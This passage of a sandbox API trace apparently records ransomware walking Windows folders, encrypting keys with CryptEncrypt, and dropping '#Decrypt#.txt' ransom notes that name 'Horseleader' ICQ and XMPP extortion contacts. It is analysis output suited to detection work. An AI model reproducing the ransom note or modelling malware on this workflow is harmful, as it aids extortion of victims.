dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0231.773] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.773] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\.") returned 77 [0231.773] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.773] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0231.774] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.774] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\..") returned 78 [0231.774] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.774] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.774] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="auxbase.xml", cAlternateFileName="")) returned 1 [0231.774] lstrcmpiW (lpString1="auxbase.xml", lpString2="Windows") returned -1 [0231.774] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 87 [0231.774] StrStrIW (lpFirst="auxbase.xml", lpSrch=".horseleader") returned 0x0 [0231.774] lstrcmpW (lpString1="auxbase.xml", lpString2="#Decrypt#.txt") returned 1 [0231.774] lstrcmpW (lpString1="auxbase.xml", lpString2="_uninstalling_.png") returned 1 [0231.774] lstrlenW (lpString=".testttjffg") returned 11 [0231.774] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpSrch=".testttjffg") returned 0x0 [0231.774] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.775] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.815] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="auxbase.xml", cAlternateFileName="")) returned 0 [0231.815] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0231.816] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\#Decrypt#.txt") returned 89 [0231.816] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0231.816] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0231.816] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0231.818] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0231.818] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0231.818] CloseHandle (hObject=0x1a4) returned 1 [0231.819] GetProcessHeap () returned 0x780000 [0231.819] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0231.819] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2b1a99, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2b1a99, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2b1a99, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0231.819] lstrcmpiW (lpString1="auxpad.xml", lpString2="Windows") returned -1 [0231.819] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 79 [0231.819] StrStrIW (lpFirst="auxpad.xml", lpSrch=".horseleader") returned 0x0 [0231.819] lstrcmpW (lpString1="auxpad.xml", lpString2="#Decrypt#.txt") returned 1 [0231.819] lstrcmpW (lpString1="auxpad.xml", lpString2="_uninstalling_.png") returned 1 [0231.819] lstrlenW (lpString=".testttjffg") returned 11 [0231.819] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpSrch=".testttjffg") returned 0x0 [0231.819] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0231.820] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0231.820] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.820] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="keypad", cAlternateFileName="")) returned 1 [0231.820] lstrcmpiW (lpString1="keypad", lpString2="Windows") returned -1 [0231.820] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned 75 [0231.820] lstrcmpW (lpString1="keypad", lpString2=".") returned 1 [0231.820] lstrcmpW (lpString1="keypad", lpString2="..") returned 1 [0231.820] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.820] GetProcessHeap () returned 0x780000 [0231.820] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0231.820] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*") returned 77 [0231.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0231.821] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.821] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\.") returned 77 [0231.821] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.821] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0231.821] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.821] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\..") returned 78 [0231.821] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.821] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.821] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f4a0c5f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f4a0c5f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="ea.xml", cAlternateFileName="")) returned 1 [0231.821] lstrcmpiW (lpString1="ea.xml", lpString2="Windows") returned -1 [0231.821] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 82 [0231.821] StrStrIW (lpFirst="ea.xml", lpSrch=".horseleader") returned 0x0 [0231.822] lstrcmpW (lpString1="ea.xml", lpString2="#Decrypt#.txt") returned 1 [0231.822] lstrcmpW (lpString1="ea.xml", lpString2="_uninstalling_.png") returned 1 [0231.822] lstrlenW (lpString=".testttjffg") returned 11 [0231.822] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpSrch=".testttjffg") returned 0x0 [0231.822] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.822] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.822] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="keypadbase.xml", cAlternateFileName="")) returned 1 [0231.822] lstrcmpiW (lpString1="keypadbase.xml", lpString2="Windows") returned -1 [0231.822] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 90 [0231.822] StrStrIW (lpFirst="keypadbase.xml", lpSrch=".horseleader") returned 0x0 [0231.822] lstrcmpW (lpString1="keypadbase.xml", lpString2="#Decrypt#.txt") returned 1 [0231.822] lstrcmpW (lpString1="keypadbase.xml", lpString2="_uninstalling_.png") returned 1 [0231.822] lstrlenW (lpString=".testttjffg") returned 11 [0231.823] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpSrch=".testttjffg") returned 0x0 [0231.823] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.823] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.841] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="kor-kor.xml", cAlternateFileName="")) returned 1 [0231.841] lstrcmpiW (lpString1="kor-kor.xml", lpString2="Windows") returned -1 [0231.841] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 87 [0231.841] StrStrIW (lpFirst="kor-kor.xml", lpSrch=".horseleader") returned 0x0 [0231.841] lstrcmpW (lpString1="kor-kor.xml", lpString2="#Decrypt#.txt") returned 1 [0231.841] lstrcmpW (lpString1="kor-kor.xml", lpString2="_uninstalling_.png") returned 1 [0231.841] lstrlenW (lpString=".testttjffg") returned 11 [0231.841] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpSrch=".testttjffg") returned 0x0 [0231.841] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.841] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.842] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.842] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="kor-kor.xml", cAlternateFileName="")) returned 0 [0231.842] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0231.842] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\#Decrypt#.txt") returned 89 [0231.842] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0231.843] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0231.843] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0231.844] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0231.844] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0231.844] CloseHandle (hObject=0x1a4) returned 1 [0231.845] GetProcessHeap () returned 0x780000 [0231.845] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0231.845] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 